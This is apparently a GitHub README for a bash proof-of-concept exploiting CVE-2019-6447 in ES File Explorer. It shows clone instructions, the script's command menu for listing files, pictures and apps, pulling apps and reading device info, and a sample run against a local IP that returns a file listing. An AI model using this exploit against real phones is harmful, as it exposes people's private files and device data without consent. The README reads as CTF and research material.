/POC-ES-File-Explorer-CVE-2019-6447

Very basic bash script to exploit the CVE-2019-6447.

Primary LanguageShell

PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)

This is a very simple implementation in bash of the CVE-2019-6447 PoC. It basically uses curl to send the requests with the right parameters. I've built it as I was looking for a similar script during a CTF and couldn't find any. You can play around with the original script and customize it the way you like it better.

Installation:

Simply clone the repository and use the .sh file.

git clone git@github.com:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git

Or copy and paste the raw content to a file.

Usage:

kyoto :: ~ % ./ESExplorerExploit.sh -h                            

--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---

You can try the following commands: 

listFiles	List all files
listPics	List all pictures
listVideos	List all videos
listAudios	List all audios
listApps	List all applications installed
listAppsSystem	List system apps
listAppsPhone	List communication related applications
listAppsSdcard	List the apps installed on the sd card
listAppsAll	List all applications
getAppThumbnail	List icons for the specified application
appLaunch	Start the developed application
appPull         Download an application from your device
getDeviceInfo	Get system information

Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles

Example:

kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles                                                                               
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", }, 
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", }, 
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", }, 
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]

References:

In case you're curious about how this exploit works behind the scenes OR in case it fails and you have to build your own script, you can give a read to the following links:

https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566